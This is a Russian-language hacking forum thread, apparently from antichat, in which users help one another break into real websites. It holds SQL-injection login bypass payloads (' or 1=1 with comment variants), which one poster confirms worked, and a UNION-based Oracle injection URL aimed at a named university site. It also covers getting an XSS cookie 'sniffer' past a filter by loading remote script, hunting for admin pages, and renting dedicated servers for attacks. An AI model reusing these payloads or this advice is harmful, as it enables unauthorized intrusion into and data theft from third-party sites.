Ваши вопросы по уязвимостям.

Всем привет ,Нашел скулю,порыл оказалось несколько баз WP,joomla, самого сайта база и еще пару штук,доступ ко всем базам есть.админку самого сайта я так и не нашел,даже базу ковырять не стал
Вопрос: как определить к каким сайтам принадлежат другие базы?если возможно конечно.
Ап вопрос решил)))
вытащил контент из базы,наешл сайт по гуглу )

 

Привет всем. Вопрос: Нашол активную xss, НО фильт обрезает все ссылки. То есть <script>alert()</script> катит, всплывает окошко, а при попытке впихнуть снифер обрезает ссылку. Например, <a href="javascript:void win('page1.html')">page1</a> вот такой код обрезает до <a href="

Помогите, спасибо зарание!

 

для WP:

Code:

select option_value from wp_options where option_name='siteurl'

 

<script src=http://ссылка_скрипт_с_кодом.js>

 

Некатит, может потому что xss во выдвигающемся меню, так только текс. А картинка наверное не грузится(
Вот в такой байде xss

Сам код на страницу попадает, но из-за тегов нет обращения к картинке(((

 

Здраствуите

кто знает kak можно узнать где на сайте располагается Страничка для входа админа.

Если это простой перебор ( www.xxx.ru/admin, /login , /backend ...) то у кого нибудь есть список самых стандартных ?

спосиб..))

 

http://forum.antichat.ru/thread40031.html

 

Драсьте.
Есть админка: http://www.site.com/admin/file.jsp, в админке 2 стандарт поля "логин" и "пасс". При подстановке в логин кавычки, выскакивает

PHP:

 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and ad_pass=''' at line 1" 

При вставке в пасс

PHP:

 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1" 

Есть ли возможность забраться в админку? И значит ли это, что там инъекция?
Заранее спасибо, и извиняюсь, если вопрос глупый.

 

попробуй в логин ' or 1=1/* пасс чо хочешь

 

Я тоже так сразу подумал. Походу фильтруется /*

PHP:

 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1" 

 

вместо /* попробуй -- или #

 

lol не lol, а фильтр все равно не пускает

PHP:

'%20' and ad_pass='12345'' at line 1"

 

*-- 1*

 

спасибо братан, получилось. Прошло с #,

 

2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?

 

заюзай дедик стоит 1-3 бакса

 

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)

 

Гнусный оракл

http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_name,null,null,null,null,null+from+sys.all_tables--+

 

del

 

Microsoft JET Database

не как не могу подобрать таблицу =(